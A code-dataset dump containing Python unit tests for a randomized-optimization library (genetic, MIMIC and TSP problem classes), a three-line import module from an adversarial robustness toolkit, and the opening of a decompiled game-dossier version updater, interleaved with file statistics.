    @staticmethod
    def test_best_neighbor_min():
        """Test best_neighbor method for a minimization problem"""
        problem = OptProb(5, OneMax(), maximize=False)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [100, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1],
                        [0, 0, 0, 0, -50]])
        problem.neighbors = pop
        x = problem.best_neighbor()
        assert np.array_equal(x, np.array([0, 0, 0, 0, -50]))
    @staticmethod
    def test_eval_fitness_max():
        """Test eval_fitness method for a maximization problem"""
        problem = OptProb(5, OneMax(), maximize=True)
        x = np.array([0, 1, 2, 3, 4])
        fitness = problem.eval_fitness(x)
        assert fitness == 10
    @staticmethod
    def test_eval_fitness_min():
        """Test eval_fitness method for a minimization problem"""
        problem = OptProb(5, OneMax(), maximize=False)
        x = np.array([0, 1, 2, 3, 4])
        fitness = problem.eval_fitness(x)
        assert fitness == -10
    @staticmethod
    def test_eval_mate_probs():
        """Test eval_mate_probs method"""
        problem = OptProb(5, OneMax(), maximize=True)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1]])
        problem.set_population(pop)
        problem.eval_mate_probs()
        # Expected values are each row's fitness divided by the total (15).
        probs = np.array([0.06667, 0.2, 0.26667, 0.13333, 0, 0.33333])
        assert np.allclose(problem.get_mate_probs(), probs, atol=0.00001)
    @staticmethod
    def test_eval_mate_probs_maximize_false():
        """Test eval_mate_probs method"""
        problem = OptProb(5, OneMax(), maximize=False)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1]])
        problem.set_population(pop)
        problem.eval_mate_probs()
        # With maximize=False the probability ordering is inverted.
        probs = np.array([0.26667, 0.13333, 0.06667, 0.2, 0.33333, 0])
        assert np.allclose(problem.get_mate_probs(), probs, atol=0.00001)
    @staticmethod
    def test_eval_mate_probs_all_zero():
        """Test eval_mate_probs method when all states have zero fitness"""
        problem = OptProb(5, OneMax(), maximize=True)
        pop = np.array([[0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0]])
        problem.set_population(pop)
        problem.eval_mate_probs()
        # Degenerate case: probabilities fall back to uniform (1/6 each).
        probs = np.array([0.16667, 0.16667, 0.16667, 0.16667,
                          0.16667, 0.16667])
        assert np.allclose(problem.get_mate_probs(), probs, atol=0.00001)
class TestDiscreteOpt(unittest.TestCase):
    """Tests for DiscreteOpt class."""
    @staticmethod
    def test_eval_node_probs():
        """Test eval_node_probs method"""
        problem = DiscreteOpt(5, OneMax(), maximize=True)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1]])
        # keep_sample is set directly so node probabilities are computed
        # from a known sample rather than a random one.
        problem.keep_sample = pop
        problem.eval_node_probs()
        parent = np.array([2, 0, 1, 0])
        probs = np.array([[[0.33333, 0.66667],
                           [0.33333, 0.66667]],
                          [[1.0, 0.0],
                           [0.33333, 0.66667]],
                          [[1.0, 0.0],
                           [0.25, 0.75]],
                          [[1.0, 0.0],
                           [0.0, 1.0]],
                          [[0.5, 0.5],
                           [0.25, 0.75]]])
        assert (np.allclose(problem.node_probs, probs, atol=0.00001)
                and np.array_equal(problem.parent_nodes, parent))
    @staticmethod
    def test_find_neighbors_max2():
        """Test find_neighbors method when max_val is equal to 2"""
        problem = DiscreteOpt(5, OneMax(), maximize=True, max_val=2)
        x = np.array([0, 1, 0, 1, 0])
        problem.set_state(x)
        problem.find_neighbors()
        # Binary case: one neighbor per position (bit flip), 5 in total.
        neigh = np.array([[1, 1, 0, 1, 0],
                          [0, 0, 0, 1, 0],
                          [0, 1, 1, 1, 0],
                          [0, 1, 0, 0, 0],
                          [0, 1, 0, 1, 1]])
        assert np.array_equal(np.array(problem.neighbors), neigh)
    @staticmethod
    def test_find_neighbors_max_gt2():
        """Test find_neighbors method when max_val is greater than 2"""
        problem = DiscreteOpt(5, OneMax(), maximize=True, max_val=3)
        x = np.array([0, 1, 2, 1, 0])
        problem.set_state(x)
        problem.find_neighbors()
        # max_val=3: each position has 2 alternative values -> 10 neighbors.
        neigh = np.array([[1, 1, 2, 1, 0],
                          [2, 1, 2, 1, 0],
                          [0, 0, 2, 1, 0],
                          [0, 2, 2, 1, 0],
                          [0, 1, 0, 1, 0],
                          [0, 1, 1, 1, 0],
                          [0, 1, 2, 0, 0],
                          [0, 1, 2, 2, 0],
                          [0, 1, 2, 1, 1],
                          [0, 1, 2, 1, 2]])
        assert np.array_equal(np.array(problem.neighbors), neigh)
    @staticmethod
    def test_find_sample_order():
        """Test find_sample_order method"""
        problem = DiscreteOpt(5, OneMax(), maximize=True)
        problem.parent_nodes = np.array([2, 0, 1, 0])
        order = np.array([0, 2, 4, 1, 3])
        problem.find_sample_order()
        assert np.array_equal(np.array(problem.sample_order), order)
    @staticmethod
    def test_find_top_pct_max():
        """Test find_top_pct method for a maximization problem"""
        problem = DiscreteOpt(5, OneMax(), maximize=True)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [100, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1],
                        [0, 0, 0, 0, -50]])
        problem.set_population(pop)
        # 25% of 8 members -> the 2 fittest rows are kept.
        problem.find_top_pct(keep_pct=0.25)
        x = np.array([[100, 0, 0, 0, 0],
                      [1, 1, 1, 1, 1]])
        assert np.array_equal(problem.get_keep_sample(), x)
    @staticmethod
    def test_find_top_pct_min():
        """Test find_top_pct method for a minimization problem"""
        problem = DiscreteOpt(5, OneMax(), maximize=False)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [100, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1],
                        [0, 0, 0, 0, -50]])
        problem.set_population(pop)
        problem.find_top_pct(keep_pct=0.25)
        x = np.array([[0, 0, 0, 0, 0],
                      [0, 0, 0, 0, -50]])
        assert np.array_equal(problem.get_keep_sample(), x)
    @staticmethod
    def test_random():
        """Test random method"""
        problem = DiscreteOpt(5, OneMax(), maximize=True, max_val=5)
        rand = problem.random()
        # NOTE(review): the bounds check looks inverted — likely intended
        # min(rand) >= 0 and max(rand) <= 4; as written it is much weaker.
        assert (len(rand) == 5 and max(rand) >= 0 and min(rand) <= 4)
    @staticmethod
    def test_random_neighbor_max2():
        """Test random_neighbor method when max_val is equal to 2"""
        problem = DiscreteOpt(5, OneMax(), maximize=True)
        x = np.array([0, 0, 1, 1, 1])
        problem.set_state(x)
        neigh = problem.random_neighbor()
        # A binary neighbor differs from x in exactly one bit.
        sum_diff = np.sum(np.abs(x - neigh))
        assert (len(neigh) == 5 and sum_diff == 1)
    @staticmethod
    def test_random_neighbor_max_gt2():
        """Test random_neighbor method when max_val is greater than 2"""
        problem = DiscreteOpt(5, OneMax(), maximize=True, max_val=5)
        x = np.array([0, 1, 2, 3, 4])
        problem.set_state(x)
        neigh = problem.random_neighbor()
        # Count changed positions (not magnitude): exactly one must differ.
        abs_diff = np.abs(x - neigh)
        abs_diff[abs_diff > 0] = 1
        sum_diff = np.sum(abs_diff)
        assert (len(neigh) == 5 and sum_diff == 1)
    @staticmethod
    def test_random_pop():
        """Test random_pop method"""
        problem = DiscreteOpt(5, OneMax(), maximize=True)
        problem.random_pop(100)
        pop = problem.get_population()
        pop_fitness = problem.get_pop_fitness()
        # Statistical sanity check: a random binary 100x5 population should
        # contain some ones but not be all ones.
        assert (np.shape(pop)[0] == 100 and np.shape(pop)[1] == 5
                and np.sum(pop) > 0 and np.sum(pop) < 500
                and len(pop_fitness) == 100)
    @staticmethod
    def test_reproduce_mut0():
        """Test reproduce method when mutation_prob is 0"""
        problem = DiscreteOpt(5, OneMax(), maximize=True)
        father = np.array([0, 0, 0, 0, 0])
        mother = np.array([1, 1, 1, 1, 1])
        child = problem.reproduce(father, mother, mutation_prob=0)
        assert (len(child) == 5 and sum(child) >= 0 and sum(child) <= 5)
    @staticmethod
    def test_reproduce_mut1_max2():
        """Test reproduce method when mutation_prob is 1 and max_val is 2"""
        problem = DiscreteOpt(5, OneMax(), maximize=True)
        father = np.array([0, 0, 0, 0, 0])
        mother = np.array([1, 1, 1, 1, 1])
        child = problem.reproduce(father, mother, mutation_prob=1)
        assert (len(child) == 5 and sum(child) >= 0 and sum(child) <= 5)
    @staticmethod
    def test_reproduce_mut1_max_gt2():
        """Test reproduce method when mutation_prob is 1 and max_val is
        greater than 2"""
        problem = DiscreteOpt(5, OneMax(),
                              maximize=True,
                              max_val=3)
        # Use a known crossover implementation for a deterministic scheme.
        problem._crossover = OnePointCrossOver(problem)
        father = np.array([0, 0, 0, 0, 0])
        mother = np.array([2, 2, 2, 2, 2])
        child = problem.reproduce(father, mother, mutation_prob=1)
        assert (len(child) == 5 and sum(child) > 0 and sum(child) < 10)
    @staticmethod
    def test_sample_pop():
        """Test sample_pop method"""
        problem = DiscreteOpt(5, OneMax(), maximize=True)
        pop = np.array([[0, 0, 0, 0, 1],
                        [1, 0, 1, 0, 1],
                        [1, 1, 1, 1, 0],
                        [1, 0, 0, 0, 1],
                        [0, 0, 0, 0, 0],
                        [1, 1, 1, 1, 1]])
        problem.keep_sample = pop
        problem.eval_node_probs()
        sample = problem.sample_pop(100)
        assert (np.shape(sample)[0] == 100 and np.shape(sample)[1] == 5
                and np.sum(sample) > 0 and np.sum(sample) < 500)
class TestContinuousOpt(unittest.TestCase):
    """Tests for ContinuousOpt class."""
    @staticmethod
    def test_calculate_updates():
        """Test calculate_updates method"""
        X = np.array([[0, 1, 0, 1],
                      [0, 0, 0, 0],
                      [1, 1, 1, 1],
                      [1, 1, 1, 1],
                      [0, 0, 1, 1],
                      [1, 0, 0, 0]])
        y = np.reshape(np.array([1, 1, 0, 0, 1, 1]), [6, 1])
        # Network layout: 4 inputs -> 2 hidden -> 1 output, identity
        # activation, no bias, regression mode.
        nodes = [4, 2, 1]
        fitness = NetworkWeights(X, y, nodes, activation=identity,
                                 bias=False, is_classifier=False,
                                 learning_rate=1)
        # Fixed weights: 1..8 for layer 1, 0.01 and 0.02 for layer 2.
        a = list(np.arange(8) + 1)
        b = list(0.01*(np.arange(2) + 1))
        weights = a + b
        fitness.evaluate(weights)
        problem = ContinuousOpt(10, fitness, maximize=False)
        updates = problem.calculate_updates()
        update1 = np.array([[-0.0017, -0.0034],
                            [-0.0046, -0.0092],
                            [-0.0052, -0.0104],
                            [0.0014, 0.0028]])
        update2 = np.array([[-3.17],
                            [-4.18]])
        assert (np.allclose(updates[0], update1, atol=0.001)
                and np.allclose(updates[1], update2, atol=0.001))
    @staticmethod
    def test_find_neighbors_range_eq_step():
        """Test find_neighbors method when range equals step size"""
        problem = ContinuousOpt(5, OneMax(), maximize=True,
                                min_val=0, max_val=1, step=1)
        x = np.array([0, 1, 0, 1, 0])
        problem.set_state(x)
        problem.find_neighbors()
        # Range == step: each position has exactly one alternative value.
        neigh = np.array([[1, 1, 0, 1, 0],
                          [0, 0, 0, 1, 0],
                          [0, 1, 1, 1, 0],
                          [0, 1, 0, 0, 0],
                          [0, 1, 0, 1, 1]])
        assert np.array_equal(np.array(problem.neighbors), neigh)
    @staticmethod
    def test_find_neighbors_range_gt_step():
        """Test find_neighbors method when range greater than step size"""
        problem = ContinuousOpt(5, OneMax(), maximize=True,
                                min_val=0, max_val=2, step=1)
        x = np.array([0, 1, 2, 1, 0])
        problem.set_state(x)
        problem.find_neighbors()
        # Interior values get two neighbors (+/- step); boundary values one.
        neigh = np.array([[1, 1, 2, 1, 0],
                          [0, 0, 2, 1, 0],
                          [0, 2, 2, 1, 0],
                          [0, 1, 1, 1, 0],
                          [0, 1, 2, 0, 0],
                          [0, 1, 2, 2, 0],
                          [0, 1, 2, 1, 1]])
        assert np.array_equal(np.array(problem.neighbors), neigh)
    @staticmethod
    def test_random():
        """Test random method"""
        problem = ContinuousOpt(5, OneMax(), maximize=True,
                                min_val=0, max_val=4)
        rand = problem.random()
        # NOTE(review): the bounds check looks inverted — likely intended
        # min(rand) >= 0 and max(rand) <= 4; as written it is much weaker.
        assert (len(rand) == 5 and max(rand) >= 0 and min(rand) <= 4)
    @staticmethod
    def test_random_neighbor_range_eq_step():
        """Test random_neighbor method when range equals step size"""
        problem = ContinuousOpt(5, OneMax(), maximize=True,
                                min_val=0, max_val=1, step=1)
        x = np.array([0, 0, 1, 1, 1])
        problem.set_state(x)
        neigh = problem.random_neighbor()
        sum_diff = np.sum(np.abs(x - neigh))
        assert (len(neigh) == 5 and sum_diff == 1)
    @staticmethod
    def test_random_neighbor_range_gt_step():
        """Test random_neighbor method when range greater than step size"""
        problem = ContinuousOpt(5, OneMax(), maximize=True,
                                min_val=0, max_val=2, step=1)
        x = np.array([0, 1, 2, 3, 4])
        problem.set_state(x)
        neigh = problem.random_neighbor()
        # Count changed positions; exactly one coordinate must move.
        abs_diff = np.abs(x - neigh)
        abs_diff[abs_diff > 0] = 1
        sum_diff = np.sum(abs_diff)
        assert (len(neigh) == 5 and sum_diff == 1)
    @staticmethod
    def test_random_pop():
        """Test random_pop method"""
        problem = ContinuousOpt(5, OneMax(), maximize=True,
                                min_val=0, max_val=1, step=1)
        problem.random_pop(100)
        pop = problem.get_population()
        pop_fitness = problem.get_pop_fitness()
        assert (np.shape(pop)[0] == 100 and np.shape(pop)[1] == 5
                and np.sum(pop) > 0 and np.sum(pop) < 500
                and len(pop_fitness) == 100)
    @staticmethod
    def test_reproduce_mut0():
        """Test reproduce method when mutation_prob is 0"""
        problem = ContinuousOpt(5, OneMax(), maximize=True,
                                min_val=0, max_val=1, step=1)
        father = np.array([0, 0, 0, 0, 0])
        mother = np.array([1, 1, 1, 1, 1])
        child = problem.reproduce(father, mother, mutation_prob=0)
        assert (len(child) == 5 and sum(child) > 0 and sum(child) < 5)
    @staticmethod
    def test_reproduce_mut1_range_eq_step():
        """Test reproduce method when mutation_prob is 1 and range equals
        step size"""
        problem = ContinuousOpt(5, OneMax(), maximize=True,
                                min_val=0, max_val=1, step=1)
        father = np.array([0, 0, 0, 0, 0])
        mother = np.array([1, 1, 1, 1, 1])
        child = problem.reproduce(father, mother, mutation_prob=1)
        assert (len(child) == 5 and sum(child) > 0 and sum(child) < 5)
    @staticmethod
    def test_reproduce_mut1_range_gt_step():
        """Test reproduce method when mutation_prob is 1 and range is
        greater than step size"""
        problem = ContinuousOpt(5, OneMax(), maximize=True,
                                min_val=0, max_val=2, step=1)
        father = np.array([0, 0, 0, 0, 0])
        mother = np.array([2, 2, 2, 2, 2])
        child = problem.reproduce(father, mother, mutation_prob=1)
        assert (len(child) == 5 and sum(child) > 0 and sum(child) < 10)
    @staticmethod
    def test_update_state_in_range():
        """Test update_state method where all updated values are within the
        tolerated range"""
        problem = ContinuousOpt(5, OneMax(), maximize=True,
                                min_val=0, max_val=20, step=1)
        x = np.array([0, 1, 2, 3, 4])
        problem.set_state(x)
        y = np.array([2, 4, 6, 8, 10])
        updated = problem.update_state(y)
        # No clipping needed: result is a plain element-wise sum.
        assert np.array_equal(updated, (x + y))
    @staticmethod
    def test_update_state_outside_range():
        """Test update_state method where some updated values are outside the
        tolerated range"""
        problem = ContinuousOpt(5, OneMax(), maximize=True,
                                min_val=0, max_val=5, step=1)
        x = np.array([0, 1, 2, 3, 4])
        problem.set_state(x)
        y = np.array([2, -4, 6, -8, 10])
        updated = problem.update_state(y)
        # Expected result is x + y clipped into [min_val, max_val] = [0, 5].
        z = np.array([2, 0, 5, 0, 5])
        assert np.array_equal(updated, z)
class TestTSPOpt(unittest.TestCase):
    """Tests for TSPOpt class."""
    @staticmethod
    def test_adjust_probs_all_zero():
        """Test adjust_probs method when all elements in input vector sum to
        zero."""
        # dists entries are (node_u, node_v, distance) triples.
        dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
                 (4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
        problem = TSPOpt(5, distances=dists)
        probs = np.zeros(5)
        # An all-zero vector cannot be normalized and is returned unchanged.
        assert np.array_equal(problem.adjust_probs(probs), np.zeros(5))
    @staticmethod
    def test_adjust_probs_non_zero():
        """Test adjust_probs method when all elements in input vector sum to
        some value other than zero."""
        dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
                 (4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
        problem = TSPOpt(5, distances=dists)
        probs = np.array([0.1, 0.2, 0, 0, 0.5])
        # Expected output is probs normalized by its sum (0.8).
        x = np.array([0.125, 0.25, 0, 0, 0.625])
        assert np.array_equal(problem.adjust_probs(probs), x)
    @staticmethod
    def test_find_neighbors():
        """Test find_neighbors method"""
        dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
                 (4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
        problem = TSPOpt(5, distances=dists)
        x = np.array([0, 1, 2, 3, 4])
        problem.set_state(x)
        problem.find_neighbors()
        # TSP neighbors are all single pairwise swaps: C(5, 2) = 10 tours.
        neigh = np.array([[1, 0, 2, 3, 4],
                          [2, 1, 0, 3, 4],
                          [3, 1, 2, 0, 4],
                          [4, 1, 2, 3, 0],
                          [0, 2, 1, 3, 4],
                          [0, 3, 2, 1, 4],
                          [0, 4, 2, 3, 1],
                          [0, 1, 3, 2, 4],
                          [0, 1, 4, 3, 2],
                          [0, 1, 2, 4, 3]])
        assert np.array_equal(np.array(problem.neighbors), neigh)
    @staticmethod
    def test_random():
        """Test random method"""
        dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
                 (4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
        problem = TSPOpt(5, distances=dists)
        rand = problem.random()
        # A valid tour is a permutation: 5 entries, all distinct.
        assert (len(rand) == 5 and len(set(rand)) == 5)
    @staticmethod
    def test_random_mimic():
        """Test random_mimic method"""
        dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
                 (4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
        pop = np.array([[1, 0, 3, 2, 4],
                        [0, 2, 1, 3, 4],
                        [0, 2, 4, 3, 1],
                        [4, 1, 3, 2, 0],
                        [3, 4, 0, 2, 1],
                        [2, 4, 0, 3, 1]])
        problem = TSPOpt(5, distances=dists)
        problem.keep_sample = pop
        problem.eval_node_probs()
        problem.find_sample_order()
        rand = problem.random_mimic()
        assert (len(rand) == 5 and len(set(rand)) == 5)
    @staticmethod
    def test_random_neighbor():
        """Test random_neighbor method"""
        dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
                 (4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
        problem = TSPOpt(5, distances=dists)
        x = np.array([0, 1, 2, 3, 4])
        problem.set_state(x)
        neigh = problem.random_neighbor()
        # A random neighbor swaps exactly two cities, so exactly two
        # positions differ and the result is still a permutation.
        abs_diff = np.abs(x - neigh)
        abs_diff[abs_diff > 0] = 1
        sum_diff = np.sum(abs_diff)
        assert (len(neigh) == 5 and sum_diff == 2 and len(set(neigh)) == 5)
    @staticmethod
    def test_reproduce_mut0():
        """Test reproduce method when mutation_prob is 0"""
        dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
                 (4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
        problem = TSPOpt(5, distances=dists)
        father = np.array([0, 1, 2, 3, 4])
        mother = np.array([0, 4, 3, 2, 1])
        child = problem.reproduce(father, mother, mutation_prob=0)
        assert (len(child) == 5 and len(set(child)) == 5)
    @staticmethod
    def test_reproduce_mut1():
        """Test reproduce method when mutation_prob is 1"""
        dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
                 (4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
        problem = TSPOpt(5, distances=dists)
        father = np.array([0, 1, 2, 3, 4])
        mother = np.array([4, 3, 2, 1, 0])
        child = problem.reproduce(father, mother, mutation_prob=1)
        assert (len(child) == 5 and len(set(child)) == 5)
    @staticmethod
    def test_sample_pop():
        """Test sample_pop method"""
        dists = [(0, 1, 3), (0, 2, 5), (0, 3, 1), (0, 4, 7), (1, 3, 6),
                 (4, 1, 9), (2, 3, 8), (2, 4, 2), (3, 2, 8), (3, 4, 4)]
        pop = np.array([[1, 0, 3, 2, 4],
                        [0, 2, 1, 3, 4],
                        [0, 2, 4, 3, 1],
                        [4, 1, 3, 2, 0],
                        [3, 4, 0, 2, 1],
                        [2, 4, 0, 3, 1]])
        problem = TSPOpt(5, distances=dists)
        problem.keep_sample = pop
        problem.eval_node_probs()
        sample = problem.sample_pop(100)
        # Every sampled tour must be a permutation of 0..4, so each row
        # sums to exactly 0+1+2+3+4 = 10.
        row_sums = np.sum(sample, axis=1)
        assert (np.shape(sample)[0] == 100 and np.shape(sample)[1] == 5
                and max(row_sums) == 10 and min(row_sums) == 10)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| 31.560758
| 86
| 0.473508
| 3,824
| 28,310
| 3.393044
| 0.055178
| 0.046089
| 0.047861
| 0.041619
| 0.847707
| 0.811407
| 0.780655
| 0.765934
| 0.740347
| 0.729094
| 0
| 0.10344
| 0.375768
| 28,310
| 896
| 87
| 31.595982
| 0.630772
| 0.094207
| 0
| 0.746924
| 0
| 0
| 0.000395
| 0
| 0
| 0
| 0
| 0
| 0.084359
| 1
| 0.084359
| false
| 0
| 0.01406
| 0
| 0.105448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86dd5ed0a9570edf7fd001d0e6cbd14f20a6a062
| 227
|
py
|
Python
|
art/estimators/generation/__init__.py
|
synergit/adversarial-robustness-toolbox
|
192c4beda1f66776f6ede94a11808eb7b4651f01
|
[
"MIT"
] | null | null | null |
art/estimators/generation/__init__.py
|
synergit/adversarial-robustness-toolbox
|
192c4beda1f66776f6ede94a11808eb7b4651f01
|
[
"MIT"
] | null | null | null |
art/estimators/generation/__init__.py
|
synergit/adversarial-robustness-toolbox
|
192c4beda1f66776f6ede94a11808eb7b4651f01
|
[
"MIT"
] | null | null | null |
"""
Generator API.
"""
from art.estimators.generation.generator import GeneratorMixin
from art.estimators.generation.tensorflow import TensorFlowGenerator
from art.estimators.generation.tensorflow import TensorFlowV2Generator
| 28.375
| 70
| 0.854626
| 23
| 227
| 8.434783
| 0.478261
| 0.108247
| 0.262887
| 0.417526
| 0.443299
| 0.443299
| 0
| 0
| 0
| 0
| 0
| 0.004762
| 0.07489
| 227
| 7
| 71
| 32.428571
| 0.919048
| 0.061674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
86e8b5366f41139f551c4f1b0b9c7146d9c0b1a0
| 114,055
|
py
|
Python
|
.OLD_FILES/dossiers2_old2/custom/updaters.py
|
KIHestad/WoT-Dossier-Parser-Create-Struct
|
9eadeeead59b7b6cf78dc6a1e1e89fe2dffb260e
|
[
"MIT"
] | null | null | null |
.OLD_FILES/dossiers2_old2/custom/updaters.py
|
KIHestad/WoT-Dossier-Parser-Create-Struct
|
9eadeeead59b7b6cf78dc6a1e1e89fe2dffb260e
|
[
"MIT"
] | null | null | null |
.OLD_FILES/dossiers2_old2/custom/updaters.py
|
KIHestad/WoT-Dossier-Parser-Create-Struct
|
9eadeeead59b7b6cf78dc6a1e1e89fe2dffb260e
|
[
"MIT"
] | 2
|
2021-11-10T19:12:57.000Z
|
2022-03-13T10:04:48.000Z
|
# uncompyle6 version 3.1.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, May 23 2015, 09:40:32) [MSC v.1500 32 bit (Intel)]
# Embedded file name: scripts/common/dossiers2/custom/updaters.py
import sys, struct
from functools import partial
from dossiers2.common.updater_utils import getNewStaticSizeBlockValues, getStaticSizeBlockRecordValues
from dossiers2.common.updater_utils import getNewBinarySetBlockValues, setStaticSizeBlockRecordValues
from dossiers2.common.updater_utils import addBlock, removeBlock, addRecords, removeRecords, setVersion
from dossiers2.common.updater_utils import getHeader, getBlockSize, getBlockCompDescr, setBlockCompDescr
import dossiers2.custom.tankmen_dossier1_updater
from VersionUpdater import VersionUpdaterBase
from wotdecorators import singleton
from debug_utils import LOG_DEBUG_DEV
from soft_exception import SoftException
# Current (target) schema version for each dossier type, paired with the
# name template of the private per-version updater functions below.
# NOTE(review): the '%d' templates are presumably formatted with a source
# version number by dispatch code elsewhere in this module — not visible
# in this chunk; confirm against the full file.
ACCOUNT_DOSSIER_VERSION = 110
ACCOUNT_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromAccountDossier%d'
VEHICLE_DOSSIER_VERSION = 100
VEHICLE_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromVehicleDossier%d'
TANKMAN_DOSSIER_VERSION = 66
TANKMAN_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromTankmanDossier%d'
CLAN_DOSSIER_VERSION = 1
CLAN_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromClanDossier%d'
RATED7X7_DOSSIER_VERSION = 1
RATED7X7_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromRated7x7Dossier%d'
CLUB_DOSSIER_VERSION = 2
CLUB_DOSSIER_UPDATE_FUNCTION_TEMPLATE = '__updateFromClubDossier%d'
def __updateFromAccountDossier64(compDescr):
    """Migrate an account dossier blob from version 64 to 65.

    Moves time/mileage counters out of 'a15x15'/'a15x15_2' into a new
    'total' block, adds 'a7x7Cut', copies selected achievement records
    into the per-mode blocks, and adds 'max15x15'/'max7x7' blocks.

    NOTE(review): this file is decompiled bytecode with original
    indentation lost; the if/else block structure below was
    reconstructed from context.
    """
    blocksLayout = [
        'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
        'achievements', 'vehTypeFrags', 'a15x15Cut', 'rareAchievements']
    # Each packing maps record name -> (byte offset, struct format) inside
    # its source static-size block.
    a15x15packing = {'creationTime': (0, 'I'), 'battleLifeTime': (8, 'I'), 'lastBattleTime': (4, 'I')}
    a15x15_2packing = {'mileage': (38, 'I'), 'treesCut': (36, 'H')}
    achievementsPacking = {'maxXPVehicle': (136, 'I'), 'maxFrags': (0, 'B'), 'maxXP': (1, 'H'),
                           'winAndSurvived': (3, 'I'),
                           'maxFragsVehicle': (140, 'I'), 'frags8p': (7, 'I')}
    totalLayout = [
        ('creationTime', 'I'), ('lastBattleTime', 'I'), ('battleLifeTime', 'I'),
        ('treesCut', 'H'), ('mileage', 'I')]
    max15x15Layout = [
        ('maxXP', 'H'), ('maxFrags', 'B'), ('maxDamage', 'H'),
        ('maxXPVehicle', 'I'), ('maxFragsVehicle', 'I'), ('maxDamageVehicle', 'I')]
    updateCtx = {'dossierCompDescr': compDescr,
                 'blockSizeFormat': 'H',
                 'versionFormat': 'H',
                 'blocksLayout': blocksLayout
                 }
    getHeader(updateCtx)
    # Read the counters being relocated; if nothing could be read, add
    # the new block empty ('' format, no values).
    totalDefaults = getStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing)
    totalDefaults.update(getStaticSizeBlockRecordValues(updateCtx, 'a15x15_2', a15x15_2packing))
    if bool(totalDefaults):
        blockFormat, blockValues = getNewStaticSizeBlockValues(totalLayout, totalDefaults)
    else:
        blockFormat, blockValues = ('', None)
    addBlock(updateCtx, 'total', blockFormat, blockValues)
    removeRecords(updateCtx, 'a15x15', a15x15packing)
    removeRecords(updateCtx, 'a15x15_2', a15x15_2packing)
    addBlock(updateCtx, 'a7x7Cut')
    achievementsValues = getStaticSizeBlockRecordValues(updateCtx, 'achievements', achievementsPacking)
    # Copy win/frag counters into the per-mode blocks (fresh in a7x7).
    addRecords(updateCtx, 'a15x15', [
        ('winAndSurvived', 'I'), ('frags8p', 'I')], achievementsValues)
    addRecords(updateCtx, 'a7x7', [
        ('winAndSurvived', 'I'), ('frags8p', 'I')], {})
    if bool(achievementsValues):
